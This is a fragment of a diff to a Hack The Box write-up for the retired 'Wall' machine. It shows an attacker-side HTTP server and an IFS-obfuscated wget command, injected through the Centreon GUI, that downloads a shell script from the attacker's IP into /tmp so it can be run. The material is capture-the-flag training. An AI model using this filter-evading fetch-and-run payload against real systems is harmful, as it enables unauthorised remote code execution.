sdbuchanan/HtB-Writeups-Retired/wall/wall.md

 root@endeavour:~/htb/wall# python -m SimpleHTTPServer 8080
 Serving HTTP on 0.0.0.0 port 8080 ...
 ```
-and then we drop the below command into the centreon GUI, give it execution rights, and then execute it
+and then we drop the below command into the centreon GUI, give it execution rights, and then execute it:

 ```console
 IFS=];b=wget]10.10.14.75:8080/htb/wall/shell.sh]-P]/tmp;$b